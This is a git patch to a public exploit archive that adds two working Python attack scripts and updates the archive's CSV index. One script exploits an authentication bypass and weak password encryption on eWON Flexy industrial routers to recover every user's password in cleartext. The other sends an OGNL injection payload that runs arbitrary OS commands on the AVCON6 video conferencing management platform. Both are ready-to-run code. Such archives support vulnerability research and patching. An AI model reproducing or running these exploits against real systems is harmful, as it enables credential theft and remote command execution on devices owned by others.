From e852f6f7990c5f4f2d4d79c165cf65638ec78e21 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Sep 2019 05:02:26 +0000 Subject: [PATCH] DB: 2019-09-12 2 changes to exploits/shellcodes Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection AVCON6 systems management platform - OGNL Remote Command Execution eWON Flexy - Authentication Bypass --- exploits/hardware/webapps/47380.py | 89 ++++++++++++++++++++++++++++++ exploits/java/webapps/47379.py | 59 ++++++++++++++++++++ files_exploits.csv | 8 ++- 3 files changed, 153 insertions(+), 3 deletions(-) create mode 100755 exploits/hardware/webapps/47380.py create mode 100755 exploits/java/webapps/47379.py diff --git a/exploits/hardware/webapps/47380.py b/exploits/hardware/webapps/47380.py new file mode 100755 index 000000000..f601ce8e2 --- /dev/null +++ b/exploits/hardware/webapps/47380.py @@ -0,0 +1,89 @@ +#! /usr/bin/env python +''' + # Exploit Title: eWON v13.0 Authentication Bypass + # Date: 2018-10-12 + # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be + # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0 + # [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability + # Vendor Homepage: https://www.ewon.biz + # Version: eWon Firmware 12.2 to 13.0 + # Tested on: eWon Flexy with Firmware 13.0s0 + + Copyright 2019 Photubias(c) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + File name eWON-Flewy-Pwn.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + This script will perform retrieval of clear text credentials for an eWON Flexy router + Tested on the eWON Flexy 201 with Firmware 13.0s0 + Only requires a valid username (default = adm) and + this user must have the Rights 'View IO' & 'Change Configuration' + + It combines two vulnerabilities: authentication bypass (fixed in 13.1s0) + and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0) +''' +username = 'adm' + +import urllib2,urllib,base64,binascii,os + +def decode(encpass): + xorString = "6414FE6F4C964746900208FC9B3904963A2F61" + def convertPass(password): + if (len(password)/2) > 19: + print('Error, password can not exceed 19 characters') + exit() + return hexxor(password, xorString[:len(password)]) + def hexxor(a, b): + return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)]) + if encpass.startswith('#_'): + encpass = encpass.split('_')[2] + coded = base64.b64decode(encpass) + codedhex = binascii.hexlify(coded)[:-4] + clearpass = binascii.unhexlify(convertPass(codedhex)) + print('Decoded password: ' + clearpass) + +def getUserData(userid, strIP): + postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]' + postwsdlist = postwsdlist.replace('|1','|'+str(userid)) + postdata = {'wsdList' : postwsdlist} + b64auth = base64.b64encode(username+':').replace('=','') + result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read() + resultarr = result.split('","') + if len(resultarr) == 20: + fname = str(resultarr[1]) + lname = str(resultarr[2]) + usern = str(resultarr[3]) + if len(usern) == 0: + return True + encpassword = resultarr[4] + print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ') + decode(encpassword) + print('---') + return True + else: + return True + +strIP = raw_input('Please enter an IP [10.0.0.53]: ') +if strIP == '': strIP = '10.0.0.53' +print('---') + +for i in range(20): + if not getUserData(i, strIP): + print('### That\'s all folks ;-) ###') + raw_input() + exit(0) + +raw_input('All Done') \ No newline at end of file diff --git a/exploits/java/webapps/47379.py b/exploits/java/webapps/47379.py new file mode 100755 index 000000000..f82332c1e --- /dev/null +++ b/exploits/java/webapps/47379.py @@ -0,0 +1,59 @@ +# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution +# Date: 10/09/2018 +# Exploit Author: Nassim Asrir +# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/ +# CVE: N\A +# Tested On: Windows 10(64bit) / 61.0b12 (64-bit) +# Thanks to: Otmane Aarab +# Example below: +# python ./rce.py http://server:8080/ id +# Testing Target: http://server:8080/ +# uid=0(root) gid=0(root) +# Vendor: http://www.epross.com/ +# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing +# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time. +# I am not responsible for any wrong use. +###################################################################################################### + +#!/usr/bin/python +# -*- coding: utf-8 -*- + +import urllib2 +import httplib + + +def exploit(url, cmd): + payload = 'login.action?redirect:' + payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).' + payload += 'start(),%23b%3d%23a.getInputStream(),' + payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),' + payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d' + payload += '.read(%23e),%23matt%3d%23context.' + payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),' + payload += '%23matt.getWriter().println(%23e),%23matt.' + payload += 'getWriter().flush(),%23matt.getWriter()' + payload += '.close()}' + + + try: + headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'} + request = urllib2.Request(url+payload, headers=headers) + page = urllib2.urlopen(request).read() + except httplib.IncompleteRead, e: + page = e.partial + + print(page) + return page + + +if __name__ == '__main__': + import sys + if len(sys.argv) != 3: + print("[*] struts2_S2-045.py http://target/ id") + else: + print('[*] Avcon6-Preauh-Remote Command Execution') + url = sys.argv[1] + cmd = sys.argv[2] + print("[*] Executed Command: %s\n" % cmd) + print("[*] Target: %s\n" % url) + exploit(url, cmd) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 68d818a69..fc0640aee 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41714,9 +41714,9 @@ id,file,description,date,author,type,platform,port 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php, 47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php, 47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80 -47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple, -47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple, -47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,80 +47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple, +47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,xerubus,webapps,multiple, +47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,xerubus,webapps,multiple,80 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80 47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi, 47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,80 @@ -41724,3 +41724,5 @@ id,file,description,date,author,type,platform,port 47371,exploits/php/webapps/47371.txt,"WordPress Plugin Photo Gallery 1.5.34 - SQL Injection",2019-09-10,MTK,webapps,php,80 47372,exploits/php/webapps/47372.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting",2019-09-10,MTK,webapps,php,80 47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80 +47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java, +47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,